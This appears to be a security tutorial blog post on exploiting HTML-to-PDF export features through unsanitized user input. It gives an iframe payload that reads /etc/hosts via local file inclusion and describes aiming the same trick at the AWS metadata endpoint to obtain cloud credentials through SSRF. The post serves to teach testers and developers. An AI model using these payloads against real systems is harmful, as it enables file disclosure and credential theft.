A lot of web applications have some sort of PDF export functionality. I see this type of feature being all over the place such as creating invoices, behavior reports, analytics reports, dashboard exports, exporting logs, generating certificates, and much more. If done incorrectly, attackers can leverage that for local file inclusion(LFI), server side request forgery(SSRF) and more. I'll be focusing on HTML to PDF converters as that's how a lot of these applications do this.
Converting HTML to PDF is the process of rendering an HTML page (which might contain CSS, JavaScript, images, etc.) into a static, printable, paginated PDF document. There are several ways of doing this. One is to use a headless browser such as chrome to load the html and print a PDF. Doing it this way will allow you to handle CSS, Javascript and everything else which might sound good but can lead to security issues.
The second way is to use a command line tool like wkhtmltopdf which uses a webkit engine to render the html and print the pdf. This kind of option can also render javascript. Finally you can use something that doesnt render javascript, this is the safest way and will prevent most vulnerabilities.
Vulnerabilities can be introduced when rendering the HTML if it contains malicious javascript code. If an application is taking unsanitized user input and inserting it into the HTML used to generate the report then you can do all kinds of things.
One of the first things to check for is LFI. If you got LFI it's pretty much game over because you will be able to read any file on the web server including source code, config files with passwords, or anything else.
Check to see if you can embed an ‘Iframe’. You can use iframes to load and display local files. For example if you are able to embed the following Iframe you will be able to read the /etc/hosts file.
Look at the code above. You can see that user input is being added to the html template without being sanitized. This means that you can insert your own html tags. As explained above if you insert an Iframe you will be able to read local files. Since the PDF is generated on the web server this allows you to read files on the server.
As shown in the image above when I type in <iframe src="file:///etc/hosts" width="100%" height="400px"></iframe> it gets embedded into the PDF allowing me to read files on the system.
In addition to LFI you can also do other things like server side request forgery(SSRF). SSRF can be used to send an HTTP request and read the response. This is often used to read metadata endpoint on cloud providers like AWS which normally contain cloud credentials. As before we can use the same Iframe trick but this time point it to the AWS metadata endpoint.
If an application has PDF export capabilities there is a good chance they are using an HTML to PDF converter. If they are also inserting unsanitized user input into the HTML template used to generate the report then there could be several security issues. Since most HTML to PDF converters allow executing javascript you can probably find LFI or SSRF.